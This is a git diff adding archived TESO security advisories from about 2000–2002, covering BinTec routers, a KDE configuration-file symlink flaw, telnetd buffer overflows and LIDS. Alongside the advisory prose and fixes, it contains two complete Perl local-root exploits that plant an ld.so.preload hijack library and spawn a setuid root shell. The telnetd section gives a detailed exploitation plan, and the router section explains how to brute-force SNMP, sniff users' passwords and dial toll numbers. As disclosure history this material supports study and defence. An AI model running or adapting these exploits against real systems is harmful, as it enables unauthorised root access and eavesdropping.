+                                {
+                                    GetNextRequest (0x5)
+                                    {
+                                        sequence (0x3)
+                                        {
+                                            integer (0x1)
+                                            0
+                                        }
+                                    }
+                                    GetResponse (0x1)
+
+                                }
+
+
+                IE-Element  : Display                : 0 Einheiten
+   [...]
+
+
+    (7) Checking line status from BinTec's httpd:
+    ___________________________________________________________________________
+
+ 
+    [...]
+    Hardware Interfaces
+ 
+    Slot 1 Ethernet o.k.
+    Slot 2 ISDN S2M o.k. used 13, available 17
+    - - X X X X X - X -
+    - - X - X - - X - -
+    X - - - X - - X - X
+    [...]
+   
+    now we know what to sniff:
+    sniffing an inbound ppp connection on line 4 slot 2:
+ 
+    bitch:~$ bricktrace -h2pit 4 0 2
+    bricktrace: Connected to aaa.bbb.ccc.ddd(7000)
+    Tracing: Channel 4 Unit 0 Slot 2
+    [...]
+    004419.999 X DATA[0045]
+          0000: 21 45 00 00 2c 39 07 40  00 3e 06 f5 cc c2 61 44 !E..,9.@.>....aD
+          0010: 0d c2 61 45 28 00 50 da  79 bc f8 a9 a7 02 2b c5 ..aE(.P.y.....+.
+          0020: 7a 60 12 44 70 3c                                z.Dp<
+              Compressed PPP packet protocol 0x21 (TCP/IP)
+         A=21  RNR  P/F=0 N(R)=2
+ 
+              IP-Packet from aaa.bbb.ccc.ddd to a.b.c.d  protocol 0x6
+              TCP-Message, sourceport 80 destinationport 55929
+                           sequence number 3170412967
+                           acknowledgement number 36423034
+                           offset 6 flags ACK SYN
+                           window 17520 checksum 0x3c9e urgent 0
+    [...] 
+    004420.640 R DATA[0609]
+          0000: 2d 70 0e b0 43 ff 47 45  54 20 68 74 74 70 3a 2f  -p..C.GET http:/
+          0010: 2f 63 68 61 74 33 2e 70  6c 61 79 67 72 6f 75 6e /chat3.playgroun
+          0020: 64 2e 64 65 2f 63                                 d.de/c
+              Compressed PPP packet protocol 0x2d (VJ Compressed TCP/IP)
+         A=2D  I    P/F=1 N(R)=3 N(S)=0
+                 0E B0 C  FF G  E  T     h  t  t  p  :  /  /  c  h  a  t  3
+                    .  p  l  a  y  g  r  o  u  n  d  .  d  e  /  c  h  a  t
+              IP-Packet from a to b protocol 0x2f
+    [...]
+   
+ 
+Impact
+===================
+
+
+    (1) SNMP communities / login passwords
+    ___________________________________________________________________________
+
+    By using standard brute-force methods, the SNMP community string, and
+    therefore the login's passwords can be obtained. A program doing this
+    is for example ADMsnmp, which has to be feeded by a wordlist. Bruteforcing
+    this way is quite effective, you get about 500-1000 words per minute.
+    (which of course depends on your and the routers connectivity) You can get
+    this program from [4]. Bruteforcing the passwords directly via telnet isn't
+    possible because the router slows down after approx. 6 tries.
+
+
+    (2) Using the CAPI facility
+    ___________________________________________________________________________
+ 
+    Nearly any router can remotely be used as 'ISDN-Line provider' -  you can
+    use the BRI-Lines of the router if they are not password protected.
+    While doing a short survey most machines we encountered were proven
+    to be vulnerable, so they didn't have any restrictions set. The CAPI
+    daemon listens on port 6000 as you can see in the 'Tests' section.
+    This feature can, for example be exploited by dialing expensive numbers
+    (0900 or 0190 [in DE] lines). You may also hide your real identity by
+    calling a 'call-by-call' ISP who gives you another IP you can deal with.
+    A (R)CAPI library for Un*x exists, which can be used for these attacks.
+    It is available via [5]. There is also a CAPI user interface for MS Windows,
+    which is called Brickware and can be obtained via [6].
+    Firmware before 5.1.x seems to be generally not passworded, we have not 
+    checked 5.1.x yet.
+
+
+    (3) Using BrickTrace for snooping BRI-Lines
+    ___________________________________________________________________________
+
+    You can gain information of the ISP or corporation running these routers
+    with open BrickTrace ports (Port 7000, default) with a program called
+    bricktrace, which is available via [7]. In the documentation this
+    port isn't even stated (!). See 'Solution' for how to turn off this port.
+    As you can see the whole data passing the line, so you also get the users
+    passwords and see what they do in the net (it is in a way like a dedicated
+    sniffer). Using this technique of sniffing you may also see private
+    information of corporations, not only restricting you to Internet
+    traffic but also on 'intranet' lines that use the same router, as well
+    as telephony networks (S0 bus).
+
+ 
+Explanation
+===================
+
+    BinTec Communications seems to rely on security by obscurity. Neither the
+    severity of these services, nor how to configure them are mentioned
+    properly in their documentation.
+    However, BinTec routers *can* be secured, it just seems not to be common
+    knowledge.
+    In addition to this, it seem to be quite useless to provide RCAPI
+    facilities on a router which is mainly used for dial-in purposes. If one
+    needs those abilities, encrypted management access would be appropriate.
+
+
+Solution
+===================
+
+    SNMP: disable (admin.biboAdmSnmpPort=0)
+                  (admin.biboAdmSnmpTrapPort=0)
+
+    RCAPI: disable or password protect
+                  (admin.biboAdmCapiTcpPort=0)
+
+    BrickTrace: disable
+                  (admin.biboAdmTraceTcpPort=0)
+
+    Just manage your Router through serial line, because if your connection
+    gets sniffed, these services can be reactivated.
+ 
+
+Acknowledgments
+================
+
+    The bug-discovery and the demonstration are due to Stephan Holtwisch [2]
+    This advisory has been written by Stephan 'rookie' Holtwisch and hendy.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@coredump.cx.
+    Our web page is at [1].
+
+
+References
+===================
+
+    [1] TESO
+        http://teso.scene.at/ or https://teso.scene.at/
+
+    [2] Stephan Holtwisch
+        sholtwis@muenster.de
+
+    [3] BinTec Communications
+        http://www.bintec.de
+
+    [4] ADMsnmp - bruteforce SNMP communities
+        ftp://adm.freelsd.net/pub/ADM/ADMsnmp.0.1.tgz
+
+    [5] libcapi for RCAPI (Unix)
+        ftp://ftp.bintec.de/pub/brick/libcapi/
+
+    [6] BrickWare (CAPI software for windows)
+        ftp://ftp.bintec.de/pub/brick/brickware/
+
+    [7] BrickTrace (BRI-Line snooping)
+        ftp://ftp.bintec.de/pub/brick/unixtool/
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied information is not to be used for
+    malicious purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    at least links [1] and [2].
+
+- ------
+
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.0.1 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+iD8DBQE45biacZZ+BjKdwjcRAlQaAJ9ozxk8JlFuEZSA0br4u+d3+CbfgACgjLHx
+fDJT2mFXDx4xRzzE7Da7pD8=
+=d2XM
+-----END PGP SIGNATURE-----
diff --git a/advisories/teso-advisory-010/7350ktuner b/advisories/teso-advisory-010/7350ktuner
new file mode 100755
index 0000000..9bcb360
--- /dev/null
+++ b/advisories/teso-advisory-010/7350ktuner
@@ -0,0 +1,86 @@
+#!/usr/bin/perl
+
+#
+# 7350ktuner! The ktuner-hack. 
+# (a.k.a. kil3r for some reason :)
+#
+# Just execute. Gives instant rootshell kiddie!
+# If only ktuner is setuid-root and vulnerable as with
+# SuSE 6.4!
+#
+# When has this stupid race an end?
+#
+# Bugdiscovery is due to Sebastian Krahmer.
+# http://www.cs.uni-potsdam.de/homepages/students/linuxer
+#
+#
+# Greets as always to TESO, security.is, lam3rz ... you all
+# know who you are.
+#
+# 
+
+my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktunerrc";
+
+$ENV{"PATH"}.=":/opt/kde/bin";
+
+print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";
+
+print "Creating hijack-lib ...\n";
+open O, ">/tmp/boom.c" or die "open(boom.c..)";
+print O<<_EOF_;
+#include <sys/types.h>
+
+int time(void *v)
+{
+        chown("/tmp/boomsh", 0, 0);
+        chmod("/tmp/boomsh", 06755);
+        unlink("/etc/ld.so.preload");
+        exit(1);
+}
+_EOF_
+close O;
+
+print "Compiling hijack-lib ...\n";
+`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
+`cc -shared /tmp/boom.o -o /tmp/boom.so`;
+
+open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
+print O<<_EOF2_;
+#include <stdio.h>
+int main() 
+{
+    char *a[] = {"/bin/sh", 0};
+    setuid(0); setregid(0, 0);
+    execve(a[0], a, 0);
+    return 0;
+}
+_EOF2_
+close O;
+
+print "Compile shell ...\n";
+`cc /tmp/boomsh.c -o /tmp/boomsh`;
+
+umask 0;
+
+unlink $rcfile;
+symlink "/etc/ld.so.preload", $rcfile;
+
+print "Invoking vulnerable program (ktuner)...\n";
+
+if (fork() == 0) {
+        `ktuner`;
+        exit 0;
+} else {
+        sleep(3);
+        kill 9, `pidof ktuner`;
+}
+
+open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
+print O "/tmp/boom.so";
+close O;
+`/usr/bin/passwd`;
+
+# let it look like if we have sth. to do. :)
+sleep 3;
+print "Welcome. But as always: BEHAVE!\n";
+system("/tmp/boomsh");
diff --git a/advisories/teso-advisory-010/7350ktvision b/advisories/teso-advisory-010/7350ktvision
new file mode 100755
index 0000000..2f8dbbd
--- /dev/null
+++ b/advisories/teso-advisory-010/7350ktvision
@@ -0,0 +1,85 @@
+#!/usr/bin/perl
+
+#
+# 7350ktvision! The ktvision-hack. 
+#
+# Just execute. Gives instant rootshell kiddie!
+# If only ktvision is setuid-root and vulnerable as with
+# SuSE 6.4!
+#
+#
+# Bugdiscovery is due to Sebastian Krahmer.
+# http://www.cs.uni-potsdam.de/homepages/students/linuxer
+#
+# Greets as always to TESO, security.is, lam3rz ... you all
+# know who you are.
+#
+# Special greets to that beautiful black-dressed woman at
+# the bus stop. This one is for you. :)
+# 
+
+my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktvisionrc";
+
+$ENV{"PATH"}.=":/opt/kde/bin";
+
+print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";
+
+print "Creating hijack-lib ...\n";
+open O, ">/tmp/boom.c" or die "open(boom.c..)";
+print O<<_EOF_;
+#include <sys/types.h>
+
+int time(void *v)
+{
+        chown("/tmp/boomsh", 0, 0);
+        chmod("/tmp/boomsh", 06755);
+        unlink("/etc/ld.so.preload");
+        exit(1);
+}
+_EOF_
+close O;
+
+print "Compiling hijack-lib ...\n";
+`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
+`cc -shared /tmp/boom.o -o /tmp/boom.so`;
+
+open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
+print O<<_EOF2_;
+#include <stdio.h>
+int main() 
+{
+    char *a[] = {"/bin/sh", 0};
+    setuid(0); setregid(0, 0);
+    execve(a[0], a, 0);
+    return 0;
+}
+_EOF2_
+close O;
+
+print "Compile shell ...\n";
+`cc /tmp/boomsh.c -o /tmp/boomsh`;
+
+umask 0;
+
+unlink $rcfile;
+symlink "/etc/ld.so.preload", $rcfile;
+
+print "Invoking vulnerable program (ktvision)...\n";
+
+if (fork() == 0) {
+        `ktvision`;
+        exit 0;
+} else {
+        sleep(3);
+        kill 9, `pidof ktvision`;
+}
+
+open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
+print O "/tmp/boom.so";
+close O;
+`/usr/bin/passwd`;
+
+# let it look like if we have sth. to do. :)
+sleep 3;
+print "Welcome. But as always: BEHAVE!\n";
+system("/tmp/boomsh");
diff --git a/advisories/teso-advisory-010/Makefile b/advisories/teso-advisory-010/Makefile
new file mode 100644
index 0000000..bf3229f
--- /dev/null
+++ b/advisories/teso-advisory-010/Makefile
@@ -0,0 +1,3 @@
+all:
+        c++ a.out.cc -I/opt/kde/include -I/usr/lib/qt/include /opt/kde/lib/libkdecore.so -lqt
+        
\ No newline at end of file
diff --git a/advisories/teso-advisory-010/a.out.cc b/advisories/teso-advisory-010/a.out.cc
new file mode 100644
index 0000000..a4a9b53
--- /dev/null
+++ b/advisories/teso-advisory-010/a.out.cc
@@ -0,0 +1,14 @@
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <kapp.h>
+
+
+int main(int argc, char **argv)
+{
+      KApplication *base = new KApplication(argc, argv);
+
+      base->exec(); 
+      return 0;
+}
+ 
diff --git a/advisories/teso-advisory-010/kil3r b/advisories/teso-advisory-010/kil3r
new file mode 120000
index 0000000..ce4e021
--- /dev/null
+++ b/advisories/teso-advisory-010/kil3r
@@ -0,0 +1 @@
+7350ktuner
\ No newline at end of file
diff --git a/advisories/teso-advisory-010/teso-advisory-010.txt b/advisories/teso-advisory-010/teso-advisory-010.txt
new file mode 100644
index 0000000..46e3522
--- /dev/null
+++ b/advisories/teso-advisory-010/teso-advisory-010.txt
@@ -0,0 +1,175 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+
+- ------
+
+TESO Security Advisory
+2000/05/29
+
+KDE KApplication {} configfile vulnerability
+
+
+Summary
+===================
+
+    A bug within the KDE configuration-file management has been
+    discovered.
+    Due to insecure creation of configuration files via KApplication-class, 
+    local lusers can create arbitrary files when running setuid root 
+    KDE-programs.
+    This can result in a complete compromise of the system.
+
+
+Systems Affected
+===================
+
+    The vulnerability is at least present within KDE 1.1.2.
+    All tests were performed on a SuSE 6.4 standard installation.
+
+
+Tests
+===================
+
+        bash-2.03$ nl /tmp/a.out.cc
+             1  #include <string.h>
+             2  #include <stdlib.h>
+             3  #include <stdio.h>
+             4  #include <kapp.h>
+
+
+             5  int main(int argc, char **argv)
+             6  {
+             7        KApplication *base = new KApplication(argc, argv);
+
+             8        base->exec();
+             9        return 0;
+            10  }
+            11
+        bash-2.03$ ls -la /etc/foo
+        ls: /etc/foo: No such file or directory
+
+        bash-2.04$ ln -s /etc/foo ~/.kde/share/config/a.outrc
+        bash-2.03$ ls -la /tmp/a.out
+        -rwsr-sr-x   1 root     root        19450 May 28 14:14 /tmp/a.out
+        bash-2.03$ /tmp/a.out
+        ^C
+
+        bash-2.03$ ls -la /etc/foo
+        -rw-rw-rw-   1 stealth  500             0 May 28 14:26 /etc/foo
+        bash-2.03$
+
+    (Output formatted to improve readability).
+
+
+Impact
+===================
+
+    An attacker may gain local root-access to a system where vulnerable KDE
+    distributions are installed.
+    Due to the GUI-nature of KDE, it might become difficult for an attacker
+    to gain a root-shell on a remote system. However, the individual could 
+    modify the DISPLAY environment variable to redirect the output to one 
+    of his own machines.
+    A vulnerable system must have at least one setuser-id program
+    installed which utilizes the KApplication class.
+    Such programs include ktvision and ktuner, for an example.
+
+
+Explanation
+===================
+
+    Obviously, KDE doesn't check for possible symlinks when creating
+    configuration-files. This may result in arbitrary file-creation or 
+    chmod's of any file.
+    We assume the bug is within the KApplication::init() function:
+    
+    ...
+    
+    // now for the local app config file
+    QString aConfigName = KApplication::localkdedir();
+    aConfigName += "/share/config/";
+    aConfigName += aAppName;
+    aConfigName += "rc";
+
+    QFile aConfigFile( aConfigName );
+    ...
+
+
+    This instanciation probably creates the file. However we haven't checked
+    QFile {} further.           
+
+
+Solution
+===================
+
+    Neither run KDE applications setuid nor setgid.
+    The KDE developers have been informed. A patch should be made available 
+    soon. Upgrade as promptly as possible.
+
+
+Acknowledgments
+================
+
+    The bug-discovery and the demonstration programs are due to
+    Sebastian "Stealth" Krahmer [1].
+    Further checking on different distributions have been made
+    by Scut.
+
+    This advisory was written by Sebastian and Scut.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@coredump.cx.
+    Our web page is at http://teso.scene.at/
+    
+    Stealth may be reached through [1].
+
+
+References
+===================
+
+    [1] http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+    [2] TESO
+        http://teso.scene.at or https://teso.scene.at/
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information about the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    links [1] and [2].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+
+    The exploit is available from
+
+       http://teso.scene.at/ or https://teso.scene.at/
+
+    and
+
+       http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+
+- ------
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.0.0 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+iD8DBQE5MWgLcZZ+BjKdwjcRAqJfAJwM5ksv/2dm7liESPMlYkQevZcfiACfb45I
+0Xp/9kMRr1FTMV6r0qh+lao=
+=6q3d
+-----END PGP SIGNATURE-----
diff --git a/advisories/teso-advisory-011.txt b/advisories/teso-advisory-011.txt
new file mode 100644
index 0000000..2711bfb
--- /dev/null
+++ b/advisories/teso-advisory-011.txt
@@ -0,0 +1,295 @@
+
+------
+
+TESO Security Advisory
+06/10/2001
+
+Multiple vendor Telnet Daemon vulnerability
+
+
+Summary
+===================
+
+    Within most of the current telnet daemons in use today there exist a buffer
+    overflow in the telnet option handling. Under certain circumstances it may
+    be possible to exploit it to gain root priviledges remotely.
+
+
+Systems Affected
+===================
+
+
+Tests
+===================
+
+    System                                  | vulnerable   | exploitable *
+    ----------------------------------------+--------------+------------------
+    FreeBSD 4.2-REL                         |      yes     |       yes
+    FreeBSD 4.3-BETA                        |      yes     |       yes
+    FreeBSD 4.3-REL                         |      yes     |        no (1)
+    FreeBSD 4.3-STABLE                      |      yes     |       yes
+    IRIX 6.5                                |      yes     |        no
+    Linux netkit-telnetd < 0.14             |      yes     |        ?
+    Linux netkit-telnetd >= 0.14            |       no     |
+    OpenBSD 2.8                             |      yes     |        ?
+    OpenBSD 2.9                             |      yes     |        ?
+    Solaris 2.8 sparc                       |      yes     |        ?
+    ----------------------------------------+--------------+------------------
+
+    * = From our analysis and conclusions, which may not be correct or we may
+        have overseen things. Do not rely on this.
+    (1) = See specific details below.
+
+    Details about the systems can be found below.
+
+
+Impact
+===================
+
+    Through sending a specially formed option string to the remote telnet
+    daemon a remote attacker might be able to overwrite sensitive information
+    on the static memory pages. If done properly this may result in arbitrary
+    code getting executed on the remote machine under the priviledges the
+    telnet daemon runs on, usually root.
+
+
+Explanation
+===================
+
+    Within every BSD derived telnet daemon under UNIX the telnet options are
+    processed by the 'telrcv' function. This function parses the options
+    according to the telnet protocol and its internal state. During this
+    parsing the results which should be send back to the client are stored
+    within the 'netobuf' buffer. This is done without any bounds checking,
+    since it is assumed that the reply data is smaller than the buffer size
+    (which is BUFSIZ bytes, usually).
+
+    However, using a combination of options, especially the 'AYT' Are You There
+    option, it is possible to append data to the buffer, usually nine bytes
+    long. To trigger this response, two bytes in the input buffer are
+    necessary. Since this input buffer is BUFSIZ bytes long, you can exceed the
+    output buffer by as much as (BUFSIZ / 2) * 9) - BUFSIZ bytes. For the
+    common case that BUFSIZ is defined to be 1024, this results in a buffer
+    overflow by up to 3584 bytes.  On systems where BUFSIZ is defined to be
+    4096, this is an even greater value (14336).
+
+    Due to the limited set of characters an attacker is able to write outside
+    of the buffer it is difficult - if not impossible on some systems - to
+    exploit this buffer overflow. Another hurdle for a possible attacker may be
+    the lack of interesting information to modify after the buffer.
+
+    This buffer overflow should be considered serious nevertheless, since
+    experience has shown that even complicated vulnerabilities can be
+    exploited by skilled attackers, BIND TSIG and SSH deattack come to mind.
+
+
+    Individual system notes
+    =======================
+
+    These notes include our rating about exploitability on the individual
+    systems. This may be invalid, due to us overlooking things or may be even
+    plain wrong. Also only the most common versions have been analyzed. If you
+    want to write an exploit, start here.
+
+
+    FreeBSD 4.2-REL
+    FreeBSD 4.3-BETA
+    ----------------
+
+    The binaries of the 4.2-REL and 4.3-BETA telnetd (/usr/libexec/telnetd
+    a0491784c6bd4662adc4eb806138f6f8 and /usr/libexec/telnetd
+    ae32821691419385103f3ca7cef89703 respectivly) contain a function pointer
+    'encrypt_output' near behind the 'netobuf' buffer, which we can overwrite.
+    This function pointer is used under certain circumstances to encrypt the
+    outgoing telnet traffic, which is called from the 'netflush' function.
+
+    By overwriting this pointer in a special way one can make it point to the
+    upper heap space. By abusing the telnet daemons setenv functionality prior
+    to the overflow one can populate the upper heap space with shellcode and
+    nops, right there, where the function pointer will point to.
+
+    The exploitation works in multiple phases:
+
+       1. Sending of ~16mb (32000 x 510 byte) bytes of nop space and shellcode
+       2. Aligning the 'nfrontp' pointer to have this position
+
+          ... | 0x00 . 0x00 0x00 0x00 | ...
+
+          Where '|' is the boundary to the function pointer after the 'netobuf'
+          buffer. The '.' position marks where 'nfrontp' points at
+       3. Send an 'IAC WILL 0x08' sequence, which will write:
+
+          ... | 0x00 0xff 0xfb 0x08 | . 0x00 ...
+
+       4. Trigger the function pointer by causing the telnet daemon to call
+          'netflush'
+
+    Step 1 is a tedious process and can even locally take a few minutes,
+    because the entire environment array is walked every time a setenv is
+    called, to check whether the environment variable already exists. Steps 2
+    to 4 are within a final overflow buffer, they are only seperated here for
+    clearness. The alignment in step 2 can be a problem since we can usually
+    only advance the 'nfrontp' pointer by three (IAC WILL|WONT|DO|DONT OPT
+    sequence) or nine ("\r\n[Yes]\r\n") bytes. To come around this we need an
+    advancement 'n' for that is true: n mod 3 = 1. XXX/TODO: write
+
+
+    FreeBSD 4.3-REL
+    ---------------
+
+    Is not affected by the function pointer method. But the 'envinit' array is
+    behind the buffer. Normally the 'envinit' array is used to initialize the
+    'environ' pointer with. The 'envinit' array is in the static memory too and
+    can be overwritten.
+
+    Once setenv is called within the telnetd process, the FreeBSD C library
+    detects that the 'environ' environment pointer points to non allocated
+    space ('alloced' global variable is 0) and creates a copy of the array
+    within the heap space. From there on, all of the telnet daemons setenv
+    requests are inserted within this malloc-stored array and the 'envinit'
+    array, which we can overwrite, becomes useless.
+
+    XXX/Proposed exploitation method:
+
+    Overwrite envinit[0] with a valid pointer to an environment string such as
+    "LD_PRELOAD=/tmp/foo.so". Normally the clients environment set requests are
+    checked for sanity and invalid values such as "LD_*", "_RLD_*" and
+    "SHELLINIT" are avoided. By using this raw overwrite method we may have a
+    chance to inject an environment string directly into the environment array.
+    To make this work a few things have to be considered. First, the pointer
+    must be valid and point to mapped space. By overwritting the pointer and
+    then continuing the normal telnet login we may be able to trick the linker
+    into loading our bogus libraries. This would be a local root exploit or a
+    remote one, if we are able to store files on the remote host.
+
+
+    IRIX 6.5
+    --------
+
+    The good thing about IRIX telnet daemon is that it comes with symbols. The
+    bad thing however is that it does not look to be exploitable. The memory
+    layout is quite easy (/usr/etc/telnetd is a N32 binary):
+
+    sizes:    (4160)  | (4)     | (4)     |
+    what:     netobuf | nfrontp | pfrontp | ...
+
+    They define - as various other telnet daemons do - an extra bogus space to
+    the 'netobuf' buffer, which is 64 bytes (called "NETSLOP" in other daemons
+    sources). 'BUFSIZ' is defined to 1024 by default on IRIX, so at first
+    glance you might think it is a problem to overwrite 4160 bytes, but it is
+    not for that we can send fragmented TCP frames which can be up to 64
+    kilobytes in size. So we can make a 4096 input buffer read without problems.
+
+    But the real problem is the 'nfrontp'. Normally the decent MIPSPro C
+    Compiler optimizes as much pointers into registers as possible, but the
+    'nfrontp' is defined static and used across all over the code, therefore
+    its memory bound into its place and always synced with its real value. If
+    we overwrite just parts of it, it reacts very sensitive and crashes at any
+    read/write access to it. Since IRIX uses the big endian mode of the MIPS
+    CPU the 'nfrontp' is stored with the most significant byte first in the
+    memory. It points to 'netobuf' which is defined on the '.bss' segment,
+    which is located at my installation at: 0x7fc49b70 to 0x7fc4f324. The
+    'nfrontp' content looks like:
+
+         ... (netobuf) ... | 0x7f 0xc4 0xcd 0xa8 | ...
+
+    Since the 'nfrontp' is constantly accessed throughout the code, one has to
+    make it always containing a sane value. Only the mapped areas of the
+    process can be used for this, which are summarized, your addresses may vary:
+
+        0x7fff0000->0x7fff8000  stack
+        0x0f9ec000->0x0fbe8000  various mapped files/libraries
+        0x7fc00114->0x7fc4f400  .text/.*data/.bss and rest
+
+    There may be a way by excessive grow of the heap by using setenv, some more
+    research for this architecture is required to draw a decision. From the
+    current point of view its very difficult, if not impossible to exploit this
+    bug on this binary.
+
+
+    Linux netkit-telnetd version < 0.14
+    -----------------------------------
+
+    XXX/TODO:
+
+
+    Linux netkit-telnetd version >= 0.14
+    ------------------------------------
+
+    Linux netkit-telnetd from version 0.14 is not directly affected by this bug
+    since they wrap a lot of storing operations which utilize 'nfrontp' in a
+    function 'netoprintf', which does boundary checking.
+
+    However it has to be checked for a one byte overflow, which may be possible
+    at multiple occurances of the code, due to the insecure nature of handling
+    'nfrontp'. Then, the following code in the function 'netoprintf' may fail
+    to do the boundary checking:
+
+      int len, maxsize;
+
+      maxsize = sizeof(netobuf) - (nfrontp - netobuf);
+
+      va_start(ap, fmt);
+      len = vsnprintf(nfrontp, maxsize, fmt, ap);
+      va_end(ap);
+
+    In case (nfrontp - netobuf) is greater than sizeof(netobuf), the integer
+    'maxsize' will turn negative and casted to a very large value in the
+    snprintf handling, which makes it behave like sprintf without any boundary
+    checking.
+
+
+Solution
+===================
+
+    The vendors have been notified of the problem at the same time as the
+    general public, vendor patches for your telnet daemon that fix the bug will
+    show up soon.
+
+    Sometimes a fix might not be trivial and require a lot of changes to the
+    source code, due to the insecure nature the 'nfrontp' pointer is handled.
+    The best long term solution is to disable the telnet daemon at all, since
+    there are good and free replacements.
+
+
+Acknowledgements
+===================
+
+    The bug has been discovered by scut.
+
+    The tests and further analysis were done by smiler, zip and scut.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@team-teso.net
+    Our web page is at http://www.team-teso.net/
+
+
+References
+===================
+
+    [1] TESO
+        http://www.team-teso.net/
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be inaccurate
+    or wrong. Possibly supplied exploit code is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1].
+
+
+Exploit
+===================
+
+------
+
+
diff --git a/advisories/teso-advisory-012.txt b/advisories/teso-advisory-012.txt
new file mode 100644
index 0000000..8056b3b
--- /dev/null
+++ b/advisories/teso-advisory-012.txt
@@ -0,0 +1,84 @@
+
+
+TESO Security Advisory
+01/01/2002
+
+LIDS Linux Intrusion Detection System vulnerability
+
+
+Summary
+===================
+
+    The "Linux Intrusion Detection System" security patches create a security
+    vulnerability. Exploitation is easy and local users may be able to gain
+    unrestricted root priviledges.
+
+
+Systems Affected
+===================
+
+    Almost any Linux system that uses the LIDS kernel patches.
+
+
+Impact
+===================
+
+    Through crafting a LD_PRELOAD library that runs without capability
+    restrictions and executing an unrestricted binary an attacker is able
+    to inherit the restrictions of the executed binary. On most systems
+    where the necessary binaries are provided, he can get rid of all his
+    restrictions.
+
+
+Explanation
+===================
+
+
+
+Solution
+===================
+
+    The vendors have been notified of the problem at the same time as the
+    general public, vendor patches that fix the bug should be available soon.
+
+
+
+Acknowledgements
+===================
+
+    The bug has been discovered by stealth.
+
+    The tests and further analysis were done by stealth.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@team-teso.net
+    Our web page is at http://www.team-teso.net/
+
+
+References
+===================
+
+    [1] TESO
+        http://www.team-teso.net/
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be inaccurate
+    or wrong. Possibly supplied exploit code is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1].
+
+
+Exploit
+===================
+
+